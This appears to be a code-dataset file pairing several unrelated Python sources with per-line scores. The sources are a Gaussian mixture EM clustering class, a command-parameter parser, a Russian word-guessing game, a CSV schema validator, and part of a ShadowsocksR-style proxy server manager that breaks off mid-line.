= mixing coefficients\n", " - relavent_clusters[i][1] = cluster id\n", " - relavent_clusters[i][2] = mean vector\n", " - relavent_clusters[i][3] = covariance matrix\n", " Clusters are sorted in descending order along their mixing coeffcients\n", " \"\"\"\n", " nmix = self._nstates\n", "\n", " # make a tuple of properties and sort its member by mixing coefficients\n", " params = sorted(zip(self.pi,range(nmix),self.mu,self.cv),\\\n", " key=lambda x:x[0],reverse=True)\n", "\n", " relavent_clusters = []\n", " for k in xrange(nmix):\n", " # exclude clusters whose pi < min_pi\n", " if params[k][0] < min_pi:\n", " break\n", "\n", " relavent_clusters.append(params[k])\n", " print \"\\n%dth component, pi = %8.3g\" % (k,params[k][0])\n", " print \"cluster id =\", params[k][1]\n", " if show_mu:\n", " print \"mu =\",params[k][2]\n", " if show_cv:\n", " print \"cv =\",params[k][3]\n", "\n", " return relavent_clusters\n", "\n", " def _log_like_f(self,obs):\n", " \"\"\"\n", " log-likelihood function of of complete data, lnP(X,Z|theta)\n", " input\n", " obs [ndarray, shape (nobs,ndim)] : observed data\n", " output\n", " lnf [ndarray, shape (nobs, nmix)] : log-likelihood\n", " where lnf[n,k] = lnP(X_n,Z_n=k|theta)\n", " \"\"\"\n", " lnf = np.log(self.pi)[np.newaxis,:] \\\n", " + log_like_Gauss(obs,self.mu,self.cv)\n", " return lnf\n", "\n", " def eval_hidden_states(self,obs):\n", " \"\"\"\n", " Calc P(Z|X,theta) = exp(lnP(X,Z|theta)) / C\n", " where C = sum_Z exp(lnP(X,Z|theta)) = P(X|theta)\n", " input\n", " obs [ndarray, shape (nobs,ndim)] : observed data\n", " output\n", " z [ndarray, shape (nobs,nmix)] : posterior probabiliry of\n", " hidden states where z[n,k] = P(Z_n=k|X_n,theta)\n", " lnP [float] : lnP(X|theta)\n", " \"\"\"\n", " lnf = self._log_like_f(obs)\n", " lnP = logsum(lnf,1)\n", " z = np.exp(lnf - lnP[:,np.newaxis])\n", " return z,lnP.sum()\n", "\n", " def score(self,obs,mode=\"BIC\"):\n", " \"\"\"\n", " score the model\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " mode [string] : one of 'ML', 'AIC' or 'BIC'\n", " output\n", " S [float] : score of the model\n", " \"\"\"\n", " z,lnP = self.eval_hidden_states(obs)\n", " nmix = self._nstates\n", " nobs, ndim = obs.shape\n", " k = num_param_Gauss(ndim)\n", " if mode in (\"AIC\", \"aic\"):\n", " # use Akaike information criterion\n", " S = -lnP + (nmix + k * nmix)\n", " if mode in (\"BIC\", \"bic\"):\n", " # use Bayesian information criterion\n", " S = -lnP + (nmix + k * nmix) * np.log(nobs)\n", " else:\n", " # use negative likelihood\n", " S = -lnP\n", " return S\n", "\n", " def fit(self,obs,niter=1000,eps=1.0e-4,ifreq=10,init=True,plot=False):\n", " \"\"\"\n", " Fit model parameters via EM algorithm\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " niter [int] : maximum number of iteration cyles\n", " eps [float] : convergence threshold\n", " ifreq [int] : frequency of printing fitting process\n", " init [bool] : flag for initialization\n", " plot [bool] : flag for plotting the result\n", " \"\"\"\n", "\n", " # initialize parameters\n", " if init:\n", " self._init_params(obs)\n", "\n", " # initialize free energy\n", " F = 1.0e50\n", "\n", " # main loop\n", " for i in xrange(niter):\n", "\n", " # performe E step and set new free energy\n", " F_new = - self._E_step(obs)\n", "\n", " # take difference\n", " dF = F_new - F\n", "\n", " # check convergence\n", " if abs(dF) < eps :\n", " print \"%8dth iter, Free Energy = %12.6e, dF = %12.6e\" \\\n", " %(i,F_new,dF)\n", " print \"%12.6e < %12.6e Converged\" %(dF, eps)\n", " break\n", "\n", " # print iteration info\n", " if i % ifreq == 0 and dF < 0.0:\n", " print \"%8dth iter, Free Energy = %12.6e, dF = %12.6e\" \\\n", " %(i,F_new,dF)\n", " elif dF > 0.0:\n", " print \"%8dth iter, Free Energy = %12.6e, dF = %12.6e warning\" \\\n", " %(i,F_new,dF)\n", "\n", " # update free energy\n", " F = F_new\n", "\n", " # update parameters by M step\n", " self._M_step(obs)\n", "\n", " # plot clustering result\n", " if plot:\n", " self.plot2d(obs)\n", "\n", " return self\n", "\n", " def _E_step(self,obs):\n", " \"\"\"\n", " E step, calculate posteriors P(Z|X,theta)\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " output\n", " lnP [float] : log-likelihood, lnP(X|theta)\n", " \"\"\"\n", " self.z, lnP = self.eval_hidden_states(obs)\n", " return lnP\n", "\n", " def _M_step(self,obs):\n", " \"\"\"\n", " M step calculates sufficient statistics and use them\n", " to update parameters\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " \"\"\"\n", " self._calculate_sufficient_statistics(obs)\n", " self._update_parameters()\n", "\n", " def _calculate_sufficient_statistics(self,obs):\n", " \"\"\"\n", " Calculate sufficient Statistics\n", " \"\"\"\n", " nmix = self._nstates\n", "\n", " # posterior average number of observation\n", " self._N = self.z.sum(0)\n", " # posterior average of x\n", " self._xbar = np.dot(self.z.T,obs) / self._N[:,np.newaxis]\n", " # posterior unnormalized sample covariance matrices\n", " for k in xrange(nmix):\n", " dobs = obs - self._xbar[k]\n", " self._C[k] = np.dot((self.z[:,k] * dobs.T), dobs)\n", "\n", " def _update_parameters(self,min_cv=0.001):\n", " \"\"\"\n", " Update parameters of posterior distribution by precomputed\n", " sufficient statistics\n", " \"\"\"\n", " nmix = self._nstates\n", " # parameter for mixing coefficients\n", " self.pi = self._N / self._N.sum()\n", " # parameters for mean vectors\n", " self.mu = np.array(self._xbar)\n", " # parameters for covariance matrices\n", " self.cv = np.identity(len(self._C[0])) * min_cv \\\n", " + self._C / self._N[:,np.newaxis,np.newaxis]\n", "\n", " def decode(self,obs,eps=0.01):\n", " \"\"\"\n", " Return most probable cluster ids.\n", " Clusters are sorted along the mixing coefficients\n", " \"\"\"\n", " # get probabilities of hidden states\n", " z,lnP = self.eval_hidden_states(obs)\n", " # take argmax\n", " codes = z.argmax(1)\n", " # get sorted ids\n", " params = self.showModel(min_pi=eps)\n", " # assign each observation to corresponding cluster\n", " clust_pos = []\n", " for p in params:\n", " clust_pos.append(codes==p[1])\n", " return clust_pos\n", "\n", " def plot1d(self,obs,d1=0,eps=0.01,clust_pos=None):\n", " \"\"\"\n", " plot data of each cluster along one axis\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " d1 [int, optional] : id of axis\n", " clust_pos [list, optional] : decoded cluster postion\n", " \"\"\"\n", " # plotting symbols\n", " symbs = \".hd^x+\"\n", " # plot range\n", " l = np.arange(len(obs))\n", " # decode observed data\n", " if clust_pos == None:\n", " clust_pos = self.decode(obs,eps)\n", " # import pyplot\n", " try :\n", " import matplotlib.pyplot as plt\n", " except ImportError :\n", " print \"cannot import pyplot\"\n", " return\n", " # plot data\n", " for k,pos in enumerate(clust_pos):\n", " symb = symbs[k / 7]\n", " plt.plot(l[pos],obs[pos,d1],symb,label=\"%3dth cluster\"%k)\n", " plt.legend(loc=0)\n", " plt.show()\n", "\n", " def plot2d(self,obs,d1=0,d2=1,eps=0.01,clust_pos=None):\n", " \"\"\"\n", " plot data of each cluster along two axes\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " d1 [int, optional] : id of the 1st axis\n", " d2 [int, optional] : id of the 2nd axis\n", " clust_pos [list, optional] : decoded cluster postion\n", " \"\"\"\n", " symbs = \".hd^x+\"\n", " if clust_pos == None:\n", " clust_pos = self.decode(obs,eps)\n", " try :\n", " import matplotlib.pyplot as plt\n", " except ImportError :\n", " print \"cannot import pyplot\"\n", " return\n", " for k,pos in enumerate(clust_pos):\n", " symb = symbs[k / 7]\n", " plt.plot(obs[pos,d1],obs[pos,d2],symb,label=\"%3dth cluster\"%k)\n", " plt.legend(loc=0)\n", " plt.show()\n", "\n", " def makeTransMat(self,obs,norm=True,min_degree=1,eps=0.01):\n", " \"\"\"\n", " Make transition probability matrix MT\n", " where MT[i,j] = N(x_{t+1}=j|x_t=i)\n", " input\n", " obs [ndarray, shape(nobs,ndim)] : observed data\n", " norm [bool] : if normalize or not\n", " min_degree [int] : transitions which occured less than min_degree\n", " times will be omitted.\n", " output\n", " MT [ndarray, shape(nmix,nmix)] : transition probabiliry matrix\n", " nmix is effective number of clusters\n", " \"\"\"\n", " # get probability of hidden states\n", " z,lnP = self.eval_hidden_states(obs)\n", " dim = self._nstates\n", "\n", " #initialize MT\n", " MT = np.zeros((dim,dim))\n", "\n", " # main loop\n", " for t in xrange(1,len(z)-1):\n", " MT += np.outer(z[t-1],z[t])\n", "\n", " for i in xrange(len(MT)):\n", " for j in xrange(len(MT)):\n", " if MT[i,j] < min_degree:\n", " MT[i,j] = 0.0\n", "\n", " # extract relavent cluster\n", " params = self.showModel(min_pi=eps)\n", " cl = [p[1] for p in params]\n", " MT = np.array([mt[cl] for mt in MT[cl]])\n", "\n", " if norm:\n", " # MT[i,j] = P(x_{t+1}=j|x_t=i)\n", " MT = normalize(MT,1)\n", "\n", " return MT\n" ]
[ 0, 0, 0, 0, 0, 0.07692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0.03125, 0, 0, 0, 0.04, 0, 0, 0, 0, 0, 0, 0.023255813953488372, 0, 0, 0, 0.044444444444444446, 0, 0.045454545454545456, 0, 0, 0.02857142857142857, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0.022222222222222223, 0, 0.04477611940298507, 0, 0.046153846153846156, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0.05970149253731343, 0.06818181818181818, 0, 0, 0, 0, 0, 0, 0, 0, 0.014705882352941176, 0, 0, 0.023809523809523808, 0, 0.023809523809523808, 0, 0, 0, 0.03225806451612903, 0, 0, 0, 0, 0, 0, 0, 0, 0.021739130434782608, 0.04, 0, 0, 0.02631578947368421, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0.022727272727272728, 0.037037037037037035, 0, 0.05555555555555555, 0, 0, 0, 0, 0, 0, 0, 0, 0.022222222222222223, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0.13333333333333333, 0.01639344262295082, 0, 0, 0, 0, 0, 0.13333333333333333, 0, 0, 0.14285714285714285, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0, 0, 0, 0, 0, 0.030303030303030304, 0, 0, 0, 0.016129032258064516, 0, 0.02127659574468085, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03508771929824561, 0, 0.05714285714285714, 0, 0, 0, 0, 0, 0.022222222222222223, 0, 0, 0, 0, 0, 0, 0, 0.023809523809523808, 0, 0, 0.07272727272727272, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03125, 0, 0.03333333333333333, 0.022222222222222223, 0, 0.07142857142857142, 0, 0.034482758620689655, 0, 0, 0, 0.023255813953488372, 0, 0.07142857142857142, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03333333333333333, 0.022222222222222223, 0.07142857142857142, 0, 0.034482758620689655, 0, 0, 0.023255813953488372, 0, 0.08, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.022222222222222223, 0, 0, 0.043478260869565216, 0.030303030303030304, 0, 0, 0.02702702702702703, 0.025, 0, 0, 0, 0.024390243902439025, 0.029411764705882353, 0, 0, 0, 0, 0, 0, 0, 0, 0.030303030303030304, 0, 0 ]
362
0.007655
false
""" Module containing the ParamPipe class. A ParamPipe object is created for every SmartCommand. In it is defined the list of expected parameters to be used. The 'add' method is probably the most useful one, and you should use it in the 'setup' method of your class inheriting 'SmartCommand'. """ from commands.parameters.list import DICT_PARAM class ParamPipe(object): """A parameter pipe, defined in every SmartCommand. A parameter pipe (ParamPipe) is used to store a list of parameters with various rules: type, default value, mandatory presence and grouping should eventually be supported. A ParamPipe object is created for every SmartCommand which can add parameters to it. When a SmartCommand is called, it uses the 'parse' method of ParamPipe to 'parse' a string into a list of interpreted parameters. Parameers are defined in the same package ('commands.parameters'). The 'add' method is used to add new parameters to the pipe. Further customization is still possible, using the returned parameter object. """ def __init__(self): self._parameters = [] self._groups = [] def add(self, ptype, default=None): """Add a new parameter. Expected arguments: ptype -- the type of parameter (str) default -- the default value of this parameter if not specified If 'default' is left to None, or set to None, the created parameter will assume it's mandatory (it has to be specified). Use a different default value to specify 'no value' (an empty string, for isntance). """ pclass = DICT_PARAM.get(ptype) if pclass is None: raise ValueError("the parameter type {} doesn't exist".format( repr(ptype))) # Create the parameter object parameter = pclass() parameter.default = default self._parameters.append(parameter) return parameter def parse(self, command): """Parse the specified args. This is a very simple implementation for the time being. """ args = command.args for parameter in self._parameters: args = parameter.parse(command, args)
[ "\"\"\"\n", "Module containing the ParamPipe class.\n", "\n", "A ParamPipe object is created for every SmartCommand. In it\n", "is defined the list of expected parameters to be used. The\n", "'add' method is probably the most useful one, and you should\n", "use it in the 'setup' method of your class inheriting\n", "'SmartCommand'.\n", "\n", "\"\"\"\n", "\n", "from commands.parameters.list import DICT_PARAM\n", "\n", "class ParamPipe(object):\n", "\n", " \"\"\"A parameter pipe, defined in every SmartCommand.\n", "\n", " A parameter pipe (ParamPipe) is used to store a list of\n", " parameters with various rules: type, default value,\n", " mandatory presence and grouping should eventually be\n", " supported. A ParamPipe object is created for every\n", " SmartCommand which can add parameters to it. When a\n", " SmartCommand is called, it uses the 'parse' method of\n", " ParamPipe to 'parse' a string into a list of interpreted\n", " parameters.\n", "\n", " Parameers are defined in the same package\n", " ('commands.parameters'). The 'add' method is used to add\n", " new parameters to the pipe. Further customization is still\n", " possible, using the returned parameter object.\n", "\n", " \"\"\"\n", "\n", " def __init__(self):\n", " self._parameters = []\n", " self._groups = []\n", "\n", " def add(self, ptype, default=None):\n", " \"\"\"Add a new parameter.\n", "\n", " Expected arguments:\n", " ptype -- the type of parameter (str)\n", " default -- the default value of this parameter if not specified\n", "\n", " If 'default' is left to None, or set to None, the\n", " created parameter will assume it's mandatory (it has to\n", " be specified). Use a different default value to\n", " specify 'no value' (an empty string, for isntance).\n", "\n", " \"\"\"\n", " pclass = DICT_PARAM.get(ptype)\n", " if pclass is None:\n", " raise ValueError(\"the parameter type {} doesn't exist\".format(\n", " repr(ptype)))\n", "\n", " # Create the parameter object\n", " parameter = pclass()\n", " parameter.default = default\n", " self._parameters.append(parameter)\n", " return parameter\n", "\n", " def parse(self, command):\n", " \"\"\"Parse the specified args.\n", "\n", " This is a very simple implementation for the time being.\n", "\n", " \"\"\"\n", " args = command.args\n", " for parameter in self._parameters:\n", " args = parameter.parse(command, args)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.04, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
70
0.000571
false
# Задача 9 # Создайте игру, в которой компьютер выбирает какое-либо слово, а игрок должен #его отгадать. Компьютер сообщает игроку, сколько букв в слове, и дает пять попыток #узнать, есть ли какая-либо буква в слове, причем программа может отвечать только #"Да" и "Нет". Вслед за тем игрок должен попробовать отгадать слово. # Dnilenkov M.A. import random spisokWord = ("собака", "автор", "волна", "скрипт", "лестница", "гиря", "физика") zagadka = random.choice(spisokWord) print ("Длина слова - ", len(zagadka)) for i in range(5): print("\n") userLeter = input ("Введите букву - ") if userLeter in zagadka: print ("Да") else: print ("Нет") if (input("\nВведите ответ - ") == zagadka): print ("Молодец") else: print ("Потом повезет") print (zagadka) input ("\n Нажмите ENTER для выхода")
[ "# Задача 9\n", "# Создайте игру, в которой компьютер выбирает какое-либо слово, а игрок должен\n", "#его отгадать. Компьютер сообщает игроку, сколько букв в слове, и дает пять попыток\n", "#узнать, есть ли какая-либо буква в слове, причем программа может отвечать только\n", "#\"Да\" и \"Нет\". Вслед за тем игрок должен попробовать отгадать слово.\n", "# Dnilenkov M.A.\n", "\n", "import random\n", "\n", "spisokWord = (\"собака\", \"автор\", \"волна\", \"скрипт\", \"лестница\", \"гиря\", \"физика\")\n", "zagadka = random.choice(spisokWord)\n", "\n", "print (\"Длина слова - \", len(zagadka))\n", "\n", "for i in range(5):\n", " print(\"\\n\")\n", " userLeter = input (\"Введите букву - \")\n", " if userLeter in zagadka:\n", " print (\"Да\")\n", " else:\n", " print (\"Нет\")\n", "\n", " \n", "if (input(\"\\nВведите ответ - \") == zagadka):\n", " print (\"Молодец\")\n", "else:\n", " print (\"Потом повезет\")\n", " print (zagadka)\n", "\n", "input (\"\\n Нажмите ENTER для выхода\")\n" ]
[ 0, 0, 0.023809523809523808, 0.024390243902439025, 0.014492753623188406, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0.02564102564102564, 0, 0, 0, 0.023255813953488372, 0, 0.047619047619047616, 0, 0.045454545454545456, 0, 0.2, 0, 0.045454545454545456, 0, 0.03571428571428571, 0.05, 0, 0.02631578947368421 ]
30
0.019145
false
import ntpath import simplejson import csv_parser def validate_file(csv_file_path, schema_file_path): csv_handle = open(csv_file_path, 'rb') csv_file_name = ntpath.basename(csv_file_path) schema_handle = open(schema_file_path, 'rb') return validate_handle(csv_handle, csv_file_name, schema_handle) def validate_handle(csv_handle, csv_file_name, schema_handle): table, embedded_schema = csv_parser.parse(csv_handle, None) schema = simplejson.load(schema_handle) tableSchema = None if "tables" in schema: talbes = schema["tables"] for i, current_table in enumerate(talbes): if "url" in current_table and current_table["url"] == csv_file_name: tableSchema = current_table break else: tableSchema = schema if not tableSchema: return (False, "Could not find schema for table %s: " % csv_file_name ) valid, error_message = validate_columns_name(embedded_schema, tableSchema) if valid: return validate_table_data(table, tableSchema) else: return valid, error_message def validate_columns_name(embedded_schema, schema): columns_in_table = embedded_schema["tableSchema"]["columns"] columns_in_schema = schema["tableSchema"]["columns"] valid = True; error_message = "" if len(columns_in_schema) != len(columns_in_table): error_message += "Column number mismatch! Csv has %s columns, but schema has %s columns.\n" % (len(columns_in_table), len(columns_in_schema)) return (False, error_message) for i, column in enumerate(columns_in_schema): if "name" in column and not column["name"] in columns_in_table[i]["titles"]: error_message += "Column: %s defined in schema, but not found in csv table!\n" % column["name"] valid = False return (valid, error_message) def validate_table_data(table, schema): table_schema = schema["tableSchema"] columns_in_schema = table_schema["columns"] valid = True; error_message = "" pk_value_set = set() pk_column_list = list() if "primaryKey" in table_schema: pk_json = table_schema["primaryKey"] if pk_json: if isinstance(pk_json, list): pk_column_list = pk_json else: pk_column_list.append(pk_json); pk_column_index_list = get_column_index(columns_in_schema, pk_column_list) for row in table.rows: # check required for i, cell in enumerate(row.cells): if not cell.value: column = columns_in_schema[i] if "required" in column and column["required"]==True: error_message += "Error in %s: Column %s is required!\n" % (str(cell), column["name"]) valid = False # check primary key if len(pk_column_index_list) > 0: pk_value = concatenate_pk_value(row, pk_column_index_list) if pk_value in pk_value_set: valid = False error_message += "Error in %s: duplicated value: %s for primary key columns: %s\n" % (str(row), pk_value, pk_column_list) else: pk_value_set.add(pk_value) return (valid, error_message) def concatenate_pk_value(row, pk_column_index_list): value_list = list() for cell in row.cells: if cell.column.number in pk_column_index_list: value_list.append(cell.value) pk_value_tuple = tuple(value_list) return pk_value_tuple def get_column_index(columns_in_schema, pk_column_list): pk_column_index_list = list() for i, column in enumerate(columns_in_schema): if column["name"] in pk_column_list: pk_column_index_list.append(i+1) return pk_column_index_list def test_validate(): table_path = "F:\WorkRecord\Feature\MCT\CsvSchema\AdyenAcquirerCode.csv" schema_path = "F:\WorkRecord\Feature\MCT\CsvSchema\AdyenAcquirerCode.schema" (ret, error_message) = validate_file(table_path, schema_path) print("Is valid: %s\nError message: \n%s\n" % (ret, error_message)) if __name__ == '__main__': test_validate()
[ "import ntpath\n", "import simplejson\n", "import csv_parser\n", "\n", "def validate_file(csv_file_path, schema_file_path):\n", " csv_handle = open(csv_file_path, 'rb')\n", " csv_file_name = ntpath.basename(csv_file_path)\n", " schema_handle = open(schema_file_path, 'rb')\n", " return validate_handle(csv_handle, csv_file_name, schema_handle)\n", " \n", "\n", "def validate_handle(csv_handle, csv_file_name, schema_handle):\n", " table, embedded_schema = csv_parser.parse(csv_handle, None)\n", " schema = simplejson.load(schema_handle)\n", " tableSchema = None\n", " if \"tables\" in schema:\n", " talbes = schema[\"tables\"]\n", " for i, current_table in enumerate(talbes):\n", " if \"url\" in current_table and current_table[\"url\"] == csv_file_name:\n", " tableSchema = current_table\n", " break\n", " else:\n", " tableSchema = schema\n", " \n", " if not tableSchema:\n", " return (False, \"Could not find schema for table %s: \" % csv_file_name )\n", " \n", " valid, error_message = validate_columns_name(embedded_schema, tableSchema)\n", " if valid:\n", " return validate_table_data(table, tableSchema)\n", " else:\n", " return valid, error_message\n", "\n", "def validate_columns_name(embedded_schema, schema):\n", " columns_in_table = embedded_schema[\"tableSchema\"][\"columns\"]\n", " columns_in_schema = schema[\"tableSchema\"][\"columns\"]\n", " \n", " valid = True; \n", " error_message = \"\"\n", " if len(columns_in_schema) != len(columns_in_table):\n", " error_message += \"Column number mismatch! Csv has %s columns, but schema has %s columns.\\n\" % (len(columns_in_table), len(columns_in_schema))\n", " return (False, error_message) \n", " \n", " for i, column in enumerate(columns_in_schema):\n", " if \"name\" in column and not column[\"name\"] in columns_in_table[i][\"titles\"]:\n", " error_message += \"Column: %s defined in schema, but not found in csv table!\\n\" % column[\"name\"]\n", " valid = False\n", " \n", " return (valid, error_message)\n", "\n", "def validate_table_data(table, schema):\n", " table_schema = schema[\"tableSchema\"]\n", " columns_in_schema = table_schema[\"columns\"]\n", " \n", " valid = True; \n", " error_message = \"\" \n", " pk_value_set = set()\n", "\n", " pk_column_list = list()\n", " if \"primaryKey\" in table_schema:\n", " pk_json = table_schema[\"primaryKey\"]\n", " if pk_json:\n", " if isinstance(pk_json, list):\n", " pk_column_list = pk_json\n", " else:\n", " pk_column_list.append(pk_json); \n", " pk_column_index_list = get_column_index(columns_in_schema, pk_column_list)\n", "\n", " for row in table.rows:\n", " # check required\n", " for i, cell in enumerate(row.cells):\n", " if not cell.value:\n", " column = columns_in_schema[i]\n", " if \"required\" in column and column[\"required\"]==True:\n", " error_message += \"Error in %s: Column %s is required!\\n\" % (str(cell), column[\"name\"])\n", " valid = False\n", " # check primary key\n", " if len(pk_column_index_list) > 0:\n", " pk_value = concatenate_pk_value(row, pk_column_index_list)\n", " if pk_value in pk_value_set:\n", " valid = False\n", " error_message += \"Error in %s: duplicated value: %s for primary key columns: %s\\n\" % (str(row), pk_value, pk_column_list)\n", " else:\n", " pk_value_set.add(pk_value)\n", "\n", " return (valid, error_message)\n", "\n", "def concatenate_pk_value(row, pk_column_index_list):\n", " value_list = list()\n", " for cell in row.cells:\n", " if cell.column.number in pk_column_index_list:\n", " value_list.append(cell.value) \n", " pk_value_tuple = tuple(value_list)\n", " return pk_value_tuple\n", "\n", "def get_column_index(columns_in_schema, pk_column_list):\n", " pk_column_index_list = list()\n", " for i, column in enumerate(columns_in_schema):\n", " if column[\"name\"] in pk_column_list:\n", " pk_column_index_list.append(i+1)\n", " \n", " return pk_column_index_list\n", "\n", "\n", "def test_validate():\n", " table_path = \"F:\\WorkRecord\\Feature\\MCT\\CsvSchema\\AdyenAcquirerCode.csv\"\n", " schema_path = \"F:\\WorkRecord\\Feature\\MCT\\CsvSchema\\AdyenAcquirerCode.schema\"\n", " (ret, error_message) = validate_file(table_path, schema_path)\n", " print(\"Is valid: %s\\nError message: \\n%s\\n\" % (ret, error_message))\n", " \n", "\n", " \n", "if __name__ == '__main__':\n", " test_validate()\n", "\n" ]
[ 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0.2, 0, 0.0125, 0.2, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0.2, 0.09090909090909091, 0, 0, 0.006666666666666667, 0.006289308176100629, 0.2, 0, 0.011764705882352941, 0.009259259259259259, 0, 0.1111111111111111, 0, 0, 0.025, 0, 0, 0.2, 0.09090909090909091, 0.0072992700729927005, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.04081632653061224, 0, 0, 0, 0, 0, 0, 0, 0.02857142857142857, 0.009259259259259259, 0, 0, 0, 0, 0, 0, 0.007246376811594203, 0, 0, 0, 0, 0, 0.018867924528301886, 0, 0, 0.01694915254237288, 0.02127659574468085, 0, 0, 0, 0.017543859649122806, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0.06493506493506493, 0.07407407407407407, 0, 0, 0.09090909090909091, 0, 0.2, 0.037037037037037035, 0, 1 ]
115
0.03
false
#!/usr/bin/python # -*- coding: UTF-8 -*- import logging import time import sys from server_pool import ServerPool import traceback from shadowsocks import common, shell, lru_cache from configloader import load_config, get_config import importloader switchrule = None db_instance = None class TransferBase(object): def __init__(self): import threading self.event = threading.Event() self.key_list = ['port', 'u', 'd', 'transfer_enable', 'passwd', 'enable'] self.last_get_transfer = {} self.last_update_transfer = {} self.user_pass = {} self.port_uid_table = {} self.onlineuser_cache = lru_cache.LRUCache(timeout=60*30) self.pull_ok = False def load_cfg(self): pass def push_db_all_user(self): if self.pull_ok is False: return #更新用户流量到数据库 last_transfer = self.last_update_transfer curr_transfer = ServerPool.get_instance().get_servers_transfer() #上次和本次的增量 dt_transfer = {} for id in curr_transfer.keys(): if id in last_transfer: if curr_transfer[id][0] + curr_transfer[id][1] - last_transfer[id][0] - last_transfer[id][1] <= 0: continue if last_transfer[id][0] <= curr_transfer[id][0] and \ last_transfer[id][1] <= curr_transfer[id][1]: dt_transfer[id] = [curr_transfer[id][0] - last_transfer[id][0], curr_transfer[id][1] - last_transfer[id][1]] else: dt_transfer[id] = [curr_transfer[id][0], curr_transfer[id][1]] else: if curr_transfer[id][0] + curr_transfer[id][1] <= 0: continue dt_transfer[id] = [curr_transfer[id][0], curr_transfer[id][1]] if id in self.last_get_transfer: if curr_transfer[id][0] + curr_transfer[id][1] > self.last_get_transfer[id][0] + self.last_get_transfer[id][1]: self.onlineuser_cache[id] = curr_transfer[id][0] + curr_transfer[id][1] else: self.onlineuser_cache[id] = curr_transfer[id][0] + curr_transfer[id][1] self.onlineuser_cache.sweep() update_transfer = self.update_all_user(dt_transfer) for id in update_transfer.keys(): last = self.last_update_transfer.get(id, [0,0]) self.last_update_transfer[id] = [last[0] + update_transfer[id][0], last[1] + update_transfer[id][1]] self.last_get_transfer = curr_transfer def del_server_out_of_bound_safe(self, last_rows, rows): #停止超流量的服务 #启动没超流量的服务 try: switchrule = importloader.load('switchrule') except Exception as e: logging.error('load switchrule.py fail') cur_servers = {} new_servers = {} for row in rows: try: allow = switchrule.isTurnOn(row) and row['enable'] == 1 and row['u'] + row['d'] < row['transfer_enable'] except Exception as e: allow = False port = row['port'] passwd = common.to_bytes(row['passwd']) cfg = {'password': passwd} if 'id' in row: self.port_uid_table[row['port']] = row['id'] read_config_keys = ['method', 'obfs', 'obfs_param', 'protocol', 'protocol_param', 'forbidden_ip', 'forbidden_port'] for name in read_config_keys: if name in row and row[name]: cfg[name] = row[name] merge_config_keys = ['password'] + read_config_keys for name in cfg.keys(): if hasattr(cfg[name], 'encode'): cfg[name] = cfg[name].encode('utf-8') if port not in cur_servers: cur_servers[port] = passwd else: logging.error('more than one user use the same port [%s]' % (port,)) continue if ServerPool.get_instance().server_is_run(port) > 0: if not allow: logging.info('db stop server at port [%s]' % (port,)) ServerPool.get_instance().cb_del_server(port) else: cfgchange = False if port in ServerPool.get_instance().tcp_servers_pool: relay = ServerPool.get_instance().tcp_servers_pool[port] for name in merge_config_keys: if name in cfg and not self.cmp(cfg[name], relay._config[name]): cfgchange = True break; if not cfgchange and port in ServerPool.get_instance().tcp_ipv6_servers_pool: relay = ServerPool.get_instance().tcp_ipv6_servers_pool[port] for name in merge_config_keys: if name in cfg and not self.cmp(cfg[name], relay._config[name]): cfgchange = True break; #config changed if cfgchange: logging.info('db stop server at port [%s] reason: config changed: %s' % (port, cfg)) ServerPool.get_instance().cb_del_server(port) new_servers[port] = (passwd, cfg) elif allow and ServerPool.get_instance().server_run_status(port) is False: #new_servers[port] = passwd protocol = cfg.get('protocol', ServerPool.get_instance().config.get('protocol', 'origin')) obfs = cfg.get('obfs', ServerPool.get_instance().config.get('obfs', 'plain')) logging.info('db start server at port [%s] pass [%s] protocol [%s] obfs [%s]' % (port, passwd, protocol, obfs)) ServerPool.get_instance().new_server(port, cfg) for row in last_rows: if row['port'] in cur_servers: pass else: logging.info('db stop server at port [%s] reason: port not exist' % (row['port'])) ServerPool.get_instance().cb_del_server(row['port']) if row['port'] in self.port_uid_table: del self.port_uid_table[row['port']] if len(new_servers) > 0: from shadowsocks import eventloop self.event.wait(eventloop.TIMEOUT_PRECISION + eventloop.TIMEOUT_PRECISION / 2) for port in new_servers.keys(): passwd, cfg = new_servers[port] protocol = cfg.get('protocol', ServerPool.get_instance().config.get('protocol', 